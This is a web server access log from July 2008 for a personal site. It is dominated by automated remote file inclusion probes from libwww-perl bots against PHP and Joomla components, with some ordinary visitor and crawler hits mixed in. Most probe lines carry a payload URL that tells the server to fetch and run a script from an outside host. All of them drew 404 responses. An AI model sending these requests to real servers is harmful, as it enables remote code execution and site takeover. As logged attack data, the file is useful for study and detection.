217.110.54.240 - - [14/Jul/2008:21:13:38 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
62.213.79.186 - - [14/Jul/2008:21:14:40 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.gibraltarnewsonline.com/advanced_poll/idosi.txt??? HTTP/1.1" 404 356 "-""libwww-perl/5.805"
62.213.79.186 - - [14/Jul/2008:21:14:41 -0500] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.gibraltarnewsonline.com/advanced_poll/idosi.txt??? HTTP/1.1" 404 361 "-""libwww-perl/5.805"
75.102.21.197 - - [14/Jul/2008:21:16:28 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 325 "-""libwww-perl/5.811"
75.102.21.197 - - [14/Jul/2008:21:16:28 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 325 "-""libwww-perl/5.811"
75.102.21.197 - - [14/Jul/2008:21:16:28 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
75.102.21.197 - - [14/Jul/2008:21:16:28 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
12.108.68.3 - - [14/Jul/2008:21:17:43 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.futuragifts.com/modules/modbanner.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
12.108.68.3 - - [14/Jul/2008:21:17:43 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.futuragifts.com/modules/modbanner.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
64.185.237.137 - - [14/Jul/2008:21:17:50 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://ebo.fr/IMG/motoon24.jpg? HTTP/1.1" 404 348 "-""libwww-perl/5.810"
64.185.237.137 - - [14/Jul/2008:21:17:50 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://ebo.fr/IMG/motoon24.jpg? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
212.160.134.131 - - [14/Jul/2008:21:21:22 -0500] "GET /logs/errors.php?error=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
212.160.134.131 - - [14/Jul/2008:21:21:22 -0500] "GET /errors.php?error=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
59.120.32.19 - - [14/Jul/2008:21:23:10 -0500] "GET /logs/errors.php?error=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
59.120.32.19 - - [14/Jul/2008:21:23:10 -0500] "GET /errors.php?error=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
217.13.86.112 - - [14/Jul/2008:21:26:03 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
217.13.86.112 - - [14/Jul/2008:21:26:03 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
77.221.157.210 - - [14/Jul/2008:21:27:23 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
77.221.157.210 - - [14/Jul/2008:21:27:23 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
71.170.172.227 - - [14/Jul/2008:21:28:19 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costumes""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.2)"
71.170.172.227 - - [14/Jul/2008:21:28:19 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.2)"
71.170.172.227 - - [14/Jul/2008:21:28:21 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://tomdolan.pconline.com/costume/""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.2)"
71.170.172.227 - - [14/Jul/2008:21:28:21 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.2)"
71.170.172.227 - - [14/Jul/2008:21:28:22 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.2)"
71.170.172.227 - - [14/Jul/2008:21:28:22 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.2)"
74.6.18.252 - - [14/Jul/2008:21:28:31 -0500] "GET /logs/access_log.1207180800 HTTP/1.0" 200 255851 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
71.170.172.227 - - [14/Jul/2008:21:28:35 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1810 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.2)"
71.170.172.227 - - [14/Jul/2008:21:28:38 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21563 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.2)"
72.47.205.18 - - [14/Jul/2008:21:29:10 -0500] "GET /logs//include/write.php?dir=http://www.iglesialcs.cl/newweb/images/arab.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
72.47.205.18 - - [14/Jul/2008:21:29:10 -0500] "GET //include/write.php?dir=http://www.iglesialcs.cl/newweb/images/arab.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
71.170.172.227 - - [14/Jul/2008:21:29:22 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3799 "http://tomdolan.pconline.com/costume/index1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.2)"
71.170.172.227 - - [14/Jul/2008:21:29:22 -0500] "GET /costume/costm2.jpg HTTP/1.1" 200 36199 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.2)"
71.170.172.227 - - [14/Jul/2008:21:29:22 -0500] "GET /costume/costm3.jpg HTTP/1.1" 200 39529 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.2)"
71.170.172.227 - - [14/Jul/2008:21:29:22 -0500] "GET /costume/costm1.jpg HTTP/1.1" 200 59753 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.2)"
71.170.172.227 - - [14/Jul/2008:21:29:23 -0500] "GET /costume/costm4.jpg HTTP/1.1" 200 36814 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.2)"
71.170.172.227 - - [14/Jul/2008:21:29:23 -0500] "GET /costume/costm5.jpg HTTP/1.1" 200 36546 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.2)"
71.170.172.227 - - [14/Jul/2008:21:29:23 -0500] "GET /costume/costm7.jpg HTTP/1.1" 200 35141 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.2)"
71.170.172.227 - - [14/Jul/2008:21:29:23 -0500] "GET /costume/costm6.jpg HTTP/1.1" 200 39194 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.2)"
71.170.172.227 - - [14/Jul/2008:21:29:23 -0500] "GET /costume/costm8.jpg HTTP/1.1" 200 35448 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.2)"
71.170.172.227 - - [14/Jul/2008:21:29:23 -0500] "GET /costume/costm9.jpg HTTP/1.1" 200 38021 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.2)"
71.170.172.227 - - [14/Jul/2008:21:29:23 -0500] "GET /costume/costm11.jpg HTTP/1.1" 200 37363 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.2)"
71.170.172.227 - - [14/Jul/2008:21:29:23 -0500] "GET /costume/costm10.jpg HTTP/1.1" 200 60187 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.2)"
71.170.172.227 - - [14/Jul/2008:21:29:23 -0500] "GET /costume/costm12.jpg HTTP/1.1" 200 35291 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.2)"
212.160.134.131 - - [14/Jul/2008:21:30:15 -0500] "GET /logs//include/write.php?dir=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.65"
212.160.134.131 - - [14/Jul/2008:21:30:15 -0500] "GET //include/write.php?dir=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.65"
202.221.143.111 - - [14/Jul/2008:21:30:41 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
202.221.143.111 - - [14/Jul/2008:21:30:41 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
65.55.208.130 - - [14/Jul/2008:21:31:12 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.130 - - [14/Jul/2008:21:31:12 -0500] "GET /artwork/index.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
212.227.65.79 - - [14/Jul/2008:21:33:40 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://web246.webgo24-server11.de/Homepage/fightus/rfi-response.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.76"
212.227.65.79 - - [14/Jul/2008:21:33:40 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://web246.webgo24-server11.de/Homepage/fightus/rfi-response.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.76"
201.116.50.181 - - [14/Jul/2008:21:36:08 -0500] "GET /logs/path/components/com_facileforms/facileforms.frame.php?ff_compath=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 342 "-""libwww-perl/5.803"
201.116.50.181 - - [14/Jul/2008:21:36:09 -0500] "GET /path/components/com_facileforms/facileforms.frame.php?ff_compath=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 337 "-""libwww-perl/5.803"
74.6.18.218 - - [14/Jul/2008:21:39:36 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.31.166 - - [14/Jul/2008:21:39:37 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
212.227.65.79 - - [14/Jul/2008:21:40:52 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.degorzen.nl/Joomla/mambots/editors/htmlarea2/popups/albid.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.76"
212.227.65.79 - - [14/Jul/2008:21:40:53 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.degorzen.nl/Joomla/mambots/editors/htmlarea2/popups/albid.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.76"
213.206.113.104 - - [14/Jul/2008:21:41:57 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
213.206.113.104 - - [14/Jul/2008:21:41:57 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
75.125.40.130 - - [14/Jul/2008:21:44:06 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 314 "-""libwww-perl/5.811"
75.125.40.130 - - [14/Jul/2008:21:44:06 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
217.13.86.112 - - [14/Jul/2008:21:46:25 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
217.13.86.112 - - [14/Jul/2008:21:46:25 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
74.6.18.252 - - [14/Jul/2008:21:48:45 -0500] "GET /logs/access_log.1162080000 HTTP/1.0" 200 191993 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
201.116.50.181 - - [14/Jul/2008:21:48:49 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 315 "-""libwww-perl/5.803"
201.116.50.181 - - [14/Jul/2008:21:48:50 -0500] "GET //include/admin.lib.inc.php?site_path=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
75.125.40.130 - - [14/Jul/2008:21:50:26 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 313 "-""libwww-perl/5.811"
75.125.40.130 - - [14/Jul/2008:21:50:26 -0500] "GET //Neos_Chronos/header.php?base_folder=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 308 "-""libwww-perl/5.811"
201.116.50.181 - - [14/Jul/2008:21:51:19 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
201.116.50.181 - - [14/Jul/2008:21:51:20 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
201.116.50.181 - - [14/Jul/2008:21:52:11 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 311 "-""libwww-perl/5.803"
201.116.50.181 - - [14/Jul/2008:21:52:12 -0500] "GET //config/dbutil.bck.php?confdir=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 306 "-""libwww-perl/5.803"
212.185.163.94 - - [14/Jul/2008:21:55:37 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.buecher.norwegen-freunde.com/files/rfi-response.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
212.185.163.94 - - [14/Jul/2008:21:55:38 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.buecher.norwegen-freunde.com/files/rfi-response.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
75.125.40.130 - - [14/Jul/2008:21:56:00 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 333 "-""libwww-perl/5.811"
75.125.40.130 - - [14/Jul/2008:21:56:00 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 328 "-""libwww-perl/5.811"
75.102.21.197 - - [14/Jul/2008:22:02:08 -0500] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 329 "-""libwww-perl/5.811"
75.102.21.197 - - [14/Jul/2008:22:02:08 -0500] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 329 "-""libwww-perl/5.811"
75.102.21.197 - - [14/Jul/2008:22:02:08 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 324 "-""libwww-perl/5.811"
75.102.21.197 - - [14/Jul/2008:22:02:08 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 324 "-""libwww-perl/5.811"
75.125.40.130 - - [14/Jul/2008:22:02:27 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 323 "-""libwww-perl/5.811"
75.125.40.130 - - [14/Jul/2008:22:02:27 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 318 "-""libwww-perl/5.811"
201.116.50.181 - - [14/Jul/2008:22:02:36 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
201.116.50.181 - - [14/Jul/2008:22:02:37 -0500] "GET //Neos_Chronos/header.php?base_folder=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
189.81.16.159 - - [14/Jul/2008:22:02:43 -0500] "GET /logs/main.php?appserv_root=http://www.dulichatlas.com/admincp/images/an.txt?? HTTP/1.1" 404 297 "-""Mozilla/3.0 (compatible; Indy Library)"
202.221.143.111 - - [14/Jul/2008:22:04:09 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.65"
202.221.143.111 - - [14/Jul/2008:22:04:10 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.65"
64.38.22.250 - - [14/Jul/2008:22:05:00 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://evro-set.ru/modules/id.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.811"
64.38.22.250 - - [14/Jul/2008:22:05:00 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://evro-set.ru/modules/id.txt?? HTTP/1.1" 404 360 "-""libwww-perl/5.811"
217.13.86.112 - - [14/Jul/2008:22:07:06 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
217.13.86.112 - - [14/Jul/2008:22:07:06 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
77.72.200.194 - - [14/Jul/2008:22:07:42 -0500] "GET /logs/access_log.1207785600//appserv/main.php?appserv_root=http://www.uitvaartverzekerenonline.nl/images/auto.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
77.72.200.194 - - [14/Jul/2008:22:07:42 -0500] "GET //appserv/main.php?appserv_root=http://www.uitvaartverzekerenonline.nl/images/auto.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.810"
77.72.200.194 - - [14/Jul/2008:22:07:43 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.uitvaartverzekerenonline.nl/images/auto.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.810"
212.241.217.176 - - [14/Jul/2008:22:12:38 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
212.241.217.176 - - [14/Jul/2008:22:12:38 -0500] "GET //skin/zero_vote/error.php?dir=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
69.72.144.162 - - [14/Jul/2008:22:12:51 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.iglesialcs.cl/newweb/images/help01.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.810"
69.72.144.162 - - [14/Jul/2008:22:12:51 -0500] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.iglesialcs.cl/newweb/images/help01.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.810"
213.238.52.61 - - [14/Jul/2008:22:13:22 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.iglesialcs.cl/newweb/images/help01.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.803"
213.238.52.61 - - [14/Jul/2008:22:13:23 -0500] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.iglesialcs.cl/newweb/images/help01.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.803"
217.217.156.81 - - [14/Jul/2008:22:14:13 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://alieandrann.net/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.813"
217.217.156.81 - - [14/Jul/2008:22:14:21 -0500] "GET //skin/zero_vote/error.php?dir=http://alieandrann.net/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.813"
64.185.237.137 - - [14/Jul/2008:22:16:16 -0500] "GET /logs/access_log.1207785600//appserv/main.php?appserv_root=http://ebo.fr/IMG/motoon24.jpg? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
64.185.237.137 - - [14/Jul/2008:22:16:16 -0500] "GET //appserv/main.php?appserv_root=http://ebo.fr/IMG/motoon24.jpg? HTTP/1.1" 404 301 "-""libwww-perl/5.810"
64.185.237.137 - - [14/Jul/2008:22:16:16 -0500] "GET /logs//appserv/main.php?appserv_root=http://ebo.fr/IMG/motoon24.jpg? HTTP/1.1" 404 306 "-""libwww-perl/5.810"
201.116.50.181 - - [14/Jul/2008:22:16:49 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 348 "-""libwww-perl/5.803"
201.116.50.181 - - [14/Jul/2008:22:16:50 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
12.108.68.3 - - [14/Jul/2008:22:21:14 -0500] "GET /logs/access_log.1207785600//appserv/main.php?appserv_root=http://www.futuragifts.com/modules/modbanner.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
12.108.68.3 - - [14/Jul/2008:22:21:14 -0500] "GET //appserv/main.php?appserv_root=http://www.futuragifts.com/modules/modbanner.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
12.108.68.3 - - [14/Jul/2008:22:21:14 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.futuragifts.com/modules/modbanner.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
201.116.50.181 - - [14/Jul/2008:22:22:38 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
201.116.50.181 - - [14/Jul/2008:22:22:39 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
66.235.112.5 - - [14/Jul/2008:22:23:07 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
66.235.112.5 - - [14/Jul/2008:22:23:07 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.0" 200 3254 "-""Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
201.116.50.181 - - [14/Jul/2008:22:23:07 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 326 "-""libwww-perl/5.803"
201.116.50.181 - - [14/Jul/2008:22:23:08 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
66.98.250.45 - - [14/Jul/2008:22:26:00 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.leokaris.com/bajo.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.65"
66.98.250.45 - - [14/Jul/2008:22:26:00 -0500] "GET //skin/zero_vote/error.php?dir=http://www.leokaris.com/bajo.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.65"
80.190.131.43 - - [14/Jul/2008:22:29:13 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.69"
80.190.131.43 - - [14/Jul/2008:22:29:14 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.69"
